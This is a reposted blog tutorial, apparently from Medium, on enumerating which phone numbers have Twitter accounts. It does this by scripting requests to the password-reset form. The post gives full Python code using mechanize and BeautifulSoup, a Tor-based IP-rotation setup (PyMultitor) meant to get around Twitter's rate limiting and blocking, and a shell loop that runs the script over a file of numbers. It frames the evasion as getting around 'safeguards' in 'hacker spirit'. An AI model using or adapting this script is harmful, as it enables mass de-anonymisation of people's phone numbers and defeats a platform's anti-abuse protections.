Coding / Programming Videos

Post your favorite coding videos and share them with others!

OSINT Twitter Phone Enumeration – int0x33 – Medium

Source link

Word on the street is that you can just curl /account/begin_password_reset with account_identifier and you would get back if there was an account, kind of true, but Twitter implements some tokens for authentic requests and also blocks if more than 7 or more of the same requests come from same IP. So, in true hacker spirit, let’s get around these ‘safeguards’ and enumerate some numbers!

The Plan…

  • Script the browser form filling
  • Send to Twitter and filter out the noise, only show if we have an account
  • If we detect Twitter blocked us, lets use a new Tor IP

Getting Started

Time to install all the bits we need…

pip install mechanize
pip install bs4
pip install lxml

The Request

This part is simple, we can use mechanise which is nice for browser automation to send the right request.

import sys
import re
from mechanize import Browser
from bs4 import BeautifulSoup
#new browser instance
br = Browser()
#open session in browser
br.open("https://twitter.com/account/begin_password_reset")
#select the first form seen in HTML response
br.select_form(nr=0)
#fill out the correct field value with the first argument to our script, the phone numbers
br.form["account_identifier"] = sys.argv[1]
#submits the form
response = br.submit()
#parse the response with lxml and BeautifulSoup
soup = BeautifulSoup(response.read(), "lxml")
#print out the text value found in 'PageHeader' section (result)
for element in soup.find_all(class_='PageHeader'):
print(element.text)
It works! Nice.

But after ~7 few tries we get this…

We will try again, don’t worry about that.

But we are impatient, and time is pwnage so let’s try and solve this issue with PyMultitor, a Python Multi Threaded Tor Proxy…

We simply add a line to use a proxy, you can also see the commented command to run pymultitor, it looks for the error string and if detected gets a new IP from Tor network.

twitter-enum.py

import sys
import re
from mechanize import Browser
from bs4 import BeautifulSoup
br = Browser()
#https://github.com/realgam3/pymultitor
#pymultitor --on-string "Please try again later."
br.set_proxies({"http": "127.0.0.1:8080"})

br.open("https://twitter.com/account/begin_password_reset")
br.select_form(nr=0)
br.form["account_identifier"] = sys.argv[1]
response = br.submit() # submit current form
soup = BeautifulSoup(response.read(), "lxml")
for element in soup.find_all(class_='PageHeader'):
print(element.text)

When it’s all set up, just add the phone numbers to a text file and run this command…

for num in $(cat numlist.txt); do python twitter-enum.py $num; done
  • NOTE: A few Tor related bugs to iron out, but when I do I will update this post and get this on github. Without IP spoofing script works great for targeted OSINT on < 6 targets.



Source link

Bookmark(0)
 

Leave a Reply

Please Login to comment
  Subscribe  
Notify of
Translate »